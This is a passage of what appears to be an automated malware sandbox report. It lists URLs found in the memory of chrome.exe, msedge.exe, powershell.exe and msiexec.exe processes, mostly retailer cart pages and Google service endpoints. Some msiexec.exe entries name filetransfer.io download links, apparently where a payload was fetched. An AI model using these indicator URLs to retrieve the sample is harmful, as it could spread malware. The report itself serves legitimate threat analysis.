              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myshop.amplify.com/cart
              Source: 000003.log5.17.drString found in binary or memory: https://ntp.msn.com
              Source: 000003.log4.17.drString found in binary or memory: https://ntp.msn.com/
              Source: Session_13375782673696843.17.dr, Favicons.17.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNH
              Source: powershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
              Source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144118475021.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144079911503.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144080071726.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: msiexec.exe, 00000009.00000003.144189148646.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poshmark.com/bundles/shop
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
              Source: msiexec.exe, 00000004.00000003.144118475021.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s20.filetransfer.io//
              Source: msiexec.exe, 00000004.00000003.144080071726.00000000054E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s20.filetransfer.io/My
              Source: msiexec.exe, 00000004.00000003.144118475021.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s20.filetransfer.io/W
              Source: msiexec.exe, 00000004.00000003.144079911503.00000000054E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s20.filetransfer.io/storage/download/DSOnK3w83O1d
              Source: msiexec.exe, 00000004.00000003.144376861712.0000000005461000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148891816559.0000000005462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s20.filetransfer.io/storage/download/DSOnK3w83O1dD
              Source: chrome.exe, 00000008.00000002.144256128104.000012AC00120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144257598930.000012AC003E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
              Source: chrome.exe, 00000008.00000002.144255805494.000012AC000B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure-oldnavy.gap.com/shopping-bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.newegg.com/shop/cart
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.advanceautoparts.com/web/OrderItemDisplay
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.lululemon.com/shop/mybag
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.google.com/product/nest_hello_doorbell2
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.google.com/product/nest_mini
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.google.com/product/nest_thermostat
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/cart/
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.usps.com/store/cart/cart.jsp
              Source: msedge.exe, 0000000F.00000002.144316834802.0000642800460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: msedge.exe, 0000000F.00000002.144316834802.0000642800460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
              Source: chrome.exe, 00000008.00000002.144260879436.000012AC00A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
              Source: chrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
              Source: Web Data.17.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
              Source: chrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
              Source: chrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=
              Source: chrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
              Source: chrome.exe, 00000008.00000002.144263189888.000012AC00F20000.00000004.00000800.00020000.00000000.sdmp, Web Data.17.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: msedge.exe, 0000000F.00000003.144303473816.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144307376820.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
              Source: msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us-1001
              Source: msedge.exe, 0000000F.00000003.144303473816.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144307376820.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us
              Source: msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us-1001
              Source: msedge.exe, 0000000F.00000003.144303473816.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144307376820.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.abebooks.com/servlet/ShopBasketPL
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.academy.com/shop/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.acehardware.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.adorama.com/als.mvc/cartview
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ae.com/us/en/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.altardstate.com/cart/
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/gp/cart/view.html
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/gp/cart/view.html
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anthropologie.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apple.com/shop/bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/purchase/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.att.com/buy/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.basspro.com/shop/AjaxOrderItemDisplayView
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bathandbodyworks.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bedbathandbeyond.com/store/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belk.com/shopping-bag/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bhphotovideo.com/find/cart.jsp
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bloomingdales.com/my-bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.boostmobile.com/cart.html
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bricklink.com/v2/globalcart.page
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.brownells.com/aspx/store/cart.aspx
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.buybuybaby.com/store/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.carid.com/cart.php
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chegg.com/shoppingcart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.containerstore.com/cart/list.htm
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.costco.com/CheckoutCartDisplayView
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.crateandbarrel.com/Checkout/Cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dickssportinggoods.com/OrderItemDisplay
              Source: chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dillards.com/webapp/wcs/stores/servlet/OrderItemDisplay
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dsw.com/en/us/shopping-bag
              Source: chrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
              Source: chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
              Source: chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.electronicexpress.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.etsy.com/cart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eyebuydirect.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.fingerhut.com/cart/index
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.finishline.com/store/cart/cart.jsp
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.freepeople.com/cart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gamestop.com/cart/
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258051957.000012AC0046C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
              Source: chrome.exe, 00000008.00000002.144256031394.000012AC000F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260344426.000012AC0092C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
              Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/#safe
              Source: chrome.exe, 00000008.00000002.144261607698.000012AC00C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/browser-features/
              Source: chrome.exe, 00000008.00000002.144261607698.000012AC00C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/browser-tools/
              Source: chrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: Web Data.17.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
              Source: chrome.exe, 00000008.00000002.144258684191.000012AC00630000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/aida2
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.groupon.com/cart
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
              Source: chrome.exe, 00000008.00000002.144259734548.000012AC00804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144255805494.000012AC000B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/translate_ranker_20180123
              Source: chrome.exe, 00000008.00000002.144259430093.000012AC007B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.guitarcenter.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.harborfreight.com/checkout/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hmhco.com/hmhstorefront/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.homedepot.com/mycart/home
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.homesquare.com/Checkout/Cart.aspx
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hottopic.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hsn.com/checkout/bag
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ikea.com/us/en/shoppingcart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.jcpenney.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.jcrew.com/checkout/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.joann.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.kohls.com/checkout/shopping_cart.jsp
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.landsend.com/shopping-bag/
              Source: chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.lowes.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.lulus.com/checkout/bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.macys.com/my-bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.midwayusa.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.neimanmarcus.com/checkout/cart.jsp
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nike.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nordstrom.com/shopping-bag
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.officedepot.com/cart/shoppingCart.do
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.opticsplanet.com/checkout/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.otterbox.com/en-us/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.overstock.com/cart
              Source: chrome.exe, 00000008.00000002.144260042929.000012AC008A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.pacsun.com/on/demandware.store/Sites-pacsun-Site/default/Cart-Show
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.petsmart.com/cart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.pier1.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.pokemoncenter.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.potterybarn.com/shoppingcart/
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.privacysandbox.comb
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.qvc.com/checkout/cart.html
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.redbubble.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.rei.com/ShoppingCart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.revolve.com/r/ShoppingBag.jsp
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.rockauto.com/en/cart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.saksfifthavenue.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.samsclub.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sephora.com/basket
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.shutterfly.com/cart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.staples.com/cc/mmx/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sweetwater.com/store/cart.php
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.talbots.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.target.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.teacherspayteachers.com/Cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.therealreal.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tractorsupply.com/TSCShoppingCartView
